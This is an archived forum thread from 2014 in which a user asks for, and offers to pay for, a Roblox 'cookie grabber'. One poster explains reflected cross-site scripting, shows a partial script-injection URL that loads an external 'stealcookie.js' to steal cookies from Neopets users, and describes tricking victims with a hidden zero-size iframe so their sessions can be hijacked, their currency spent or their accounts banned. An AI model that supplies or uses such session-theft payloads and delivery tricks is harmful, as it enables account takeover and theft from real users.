PDA

View Full Version : [Roblox program request ] Is it possible to make a cookie grabber?

Flame
06-17-2014, 04:59 PM
Is it possible to make a cookie grabber link for roblox?
Or any other programs that are similar like auto buyers?

Paying for a program if it is possible for one to be made? I believe roblox is squirrel.

How much would it cost?

Anybody up for a challenge of it is one?

DarkByte
07-02-2014, 04:30 AM
Depends to much on the site , you need a link where what you input is echoed in the page so for instance if there a search box that lets you search for 'hats' and then the next page says something like:

Found 10202 results for hats

We could change the word hats then to our own html if it was not properly checked , but this is doubtfull. Cookie grabbers are easy to stop now days with some simple built in functions. No ones really going to speand time investigating this though as coming across a xss can take alot of time , skill and most of all alot of luck.

Here is a e.g of a cookie grabber on neopets:

[Only registered and activated users can see links] rox

notice how when we visit this link 'xss rox' is in the source code?

Lets change it up a little to some html....

[Only registered and activated users can see links] ://[Only registered and activated users can see links]

Oh neat now it shows a love heat gif using image codes :D.

And here is what a actual cookie grab would look like:

[Only registered and activated users can see links] ttp://somesite.com/stealcookie.js%3E%3C/SCRIPT%3E

stealcookie.js can then be used to log our browser cookie.

Vindictive
07-09-2014, 10:14 AM
What can this cookie geabber script be used for on Neo? DarkByte

j03
07-09-2014, 10:28 AM
[Only registered and activated users can see links]

Well, it's called a cookie grabber, so what do you think? :P

But he was only showing an example, and he did not provide an actual script. This will not work on Neopets unless you find yourself an exploit somewhere.

DarkByte
07-09-2014, 10:30 AM
I actually posted a exploit joe :D ,

Its that old one i reported months back and they never fixed it maybe they will now :P.

Pretty much a cookie is how your browser remembers your login details for neopets. This lets u steal someones and use there cookie , so you login as them. They are not as powerfull as they once was and this is a external one. The best way to use this would be to send someone a link that loads a image or something to get there attention. In the back ground load a iframe that links to the Xss link but make its width/height 0 so the user cant even see it. Now when they visit your link to look at what they think is a sshot or whatever you steal there cookie in the background.

Its fun to troll with and i suppose you could be destructive (spend a persons np/nc on junk , get people banned ect)..

Vindictive
07-09-2014, 11:29 AM
Interesting...thanks for posting that. I doubt ill go thru the trouble of using it to troll around. Ive been busy building up two mains and it takes alot of time between the two :P

Josh
07-10-2014, 10:58 AM
Is it possible to make a cookie grabber link for roblox?
Or any other programs that are similar like auto buyers?

Paying for a program if it is possible for one to be made? I believe roblox is squirrel.

How much would it cost?

Anybody up for a challenge of it is one?

Also depends on how their cookies are set up. Some are IP based. At the point, theres nothing you can do.